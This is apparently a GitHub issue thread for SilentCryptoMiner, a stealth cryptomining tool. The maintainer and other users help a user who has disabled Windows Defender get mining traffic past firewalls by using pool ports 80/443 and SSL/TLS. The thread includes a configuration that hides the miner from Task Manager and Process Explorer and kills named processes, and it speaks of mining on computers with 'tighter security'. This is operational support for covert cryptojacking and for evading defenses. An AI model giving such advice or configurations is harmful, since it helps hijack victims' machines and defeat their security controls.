### ISSUE TITLE
After Bypass windows defender 

### ISSUE THREAD

**Issue by tarekxxx** [UnamSanctam/SilentCryptoMiner#491]
i faced problem with firewall not allow me so there any update to program put his self for allow program ?

**Comment by UnamSanctam** [comment]
What? You mean that the miner traffic isn't allowed through the firewall? I haven't ever heard that happening before.

**Comment by Toxenskiy** [comment]
use pool with port 80/443

**Comment by UnamSanctam** [comment]
Yes it's as @Toxenskiy says, if the connection to a pool is ever blocked by a firewall then usually mining to port 80 or 443 will work. But you also need to find a pool that supports those ports, like MineroOcean.

**Comment by Toxenskiy** [comment]
or hashvault

**Comment by tarekxxx** [comment]
> What? You mean that the miner traffic isn't allowed through the firewall? I haven't ever heard that happening before.

yea i disabled windows defender bytool helped me do this  and program running and loading but there no traffic because firewall if there update can bypass firewall like bypass defender it will be cool like program put his self in list of firewall to make it allow traffic

**Comment by UnamSanctam** [comment]
That's not really possible to do since it injects into a program, I've tried adding for example explorer.exe as an allowed program but that doesn't really work.

You should use a pool that has port 80 or 443 to bypass most firewalls.

**Comment by UnamSanctam** [comment]
Best I know for that would be MoneroOcean.

**Comment by UnamSanctam** [comment]
Yes exactly but remove the `.AboE/mypassword123` for MoneroOcean, if you want a worker name then add `"password": "AboE",`

**Comment by tarekxxx** [comment]
this right ?

{
"algo": "rx/0",
"pool": "gulf.moneroocean.stream",
"port": 443,
"wallet": "4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuuBCKutHVFPU5qMxA",
"password": "AboE",
"ssltls": true,
"max-cpu": 0,
"idle-wait": 1,
"idle-cpu": 100,
"stealth": true,
"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,AndroidEmulatorEn.exe,s2_sp64_ship.exe,BravoHotelClient-Win64-Shipping.protected.exe",
"kill-targets": "program.exe,program1.exe"

**Comment by tarekxxx** [comment]
this usefull thanks sir <3

**Comment by supremeneo6** [comment]
> 

you only need to change the password from "AboE" to "AboE~ghostrider" to mine RTM on moneroocean? Are there different passwords for different coins?

**Comment by UnamSanctam** [comment]
>you only need to change the password from "AboE" to "AboE~ghostrider" to mine RTM on moneroocean? Are there different passwords for different coins?

Yes, if you go to MoneroOcean then you can find a "Coins" tab at the bottom, then you can enter one of those algorithms for a coin with `~algorithm` after the password. Though of course you can only do that with algorithms that the miner has.

**Comment by supremeneo6** [comment]
> > you only need to change the password from "AboE" to "AboE~ghostrider" to mine RTM on moneroocean? Are there different passwords for different coins?
> 
> Yes, if you go to MoneroOcean then you can find a "Coins" tab at the bottom, then you can enter one of those algorithms for a coin with `~algorithm` after the password. Though of course you can only do that with algorithms that the miner has.

gotcha. what's the default password where moneroocean chooses to mine the most profitable coin at the time and convert it to XMR? thanks in advance.

**Comment by UnamSanctam** [comment]
> gotcha. what's the default password where moneroocean chooses to mine the most profitable coin at the time and convert it to XMR? thanks in advance.

My miner doesn't have automatic benchmarking included (like the MoneroOcean miner) since it can lag on some computers and saving the benchmarking can be a bit of a hassle. From my testing, all coins are nearly the same in profit though, except for RTM which is the only one more profitable by a noticeable margin for me.

**Comment by supremeneo6** [comment]
> > gotcha. what's the default password where moneroocean chooses to mine the most profitable coin at the time and convert it to XMR? thanks in advance.
> 
> My miner doesn't have automatic benchmarking included (like the MoneroOcean miner) since it can lag on some computers and saving the benchmarking can be a bit of a hassle. From my testing, all coins are nearly the same in profit though, except for RTM which is the only one more profitable by a noticeable margin for me.

ok that makes sense. i'm assuming you have to change the wallet address to a raptoreum address as well? is the coin supported on Exodus?

**Comment by UnamSanctam** [comment]
> ok that makes sense. i'm assuming you have to change the wallet address to a raptoreum address as well? is the coin supported on Exodus?

No MoneroOcean only pays out in XMR, I don't think it's possible to get payed out in whatever coin your mining but instead they just exchange it to XMR.

**Comment by supremeneo6** [comment]
Ok I just had a couple more questions to clarify some things. 

Can you use both CPU and GPU for a single XMR miner build?

Do you change the algo for Raptoreum when using moneroocean or just keep it at rx/0 and add ~ghostrider to the password?

When selecting the port difficulty, do you take into consideration the cpu/gpu percentage you selected for the miner to calculate the hashrate with the randomx benchmark or can you just use port 80/443 and leave the manual difficulty blank?

Do you want to use SSL/TLS port by default just in case there is a firewall and just set the difficulty manually or is there an advantage for using the regular ports?

**Comment by supremeneo6** [comment]
your wiki says not to use GPU for xmr, sorry i missed that

**Comment by UnamSanctam** [comment]
Yeah GPU mining isn't very good for XMR.

For MoneroOcean you should just keep it at rx/0 and add ~ghostrider to the password, I've seen their pool bug a bit if you also change the algorithm away from rx/0.

Usually the port difficulty doesn't really matter that much since most pools (MoneroOcean included) just changes the difficulty dynamically over time, so you can use port 80/443 just fine and leave the manual difficulty blank.

Yes using SSL/TLS is usually the best when you're not too sure about the configurations about all computers you mine on, since some could have tighter security. You don't really need to set the difficulty manually. Using higher difficulty ports is usually necessary if you use something like xmrig-proxy and have a lot of hashrate coming from it, since it can "DDoS" the pool then, but for a single computer it usually doesn't matter.
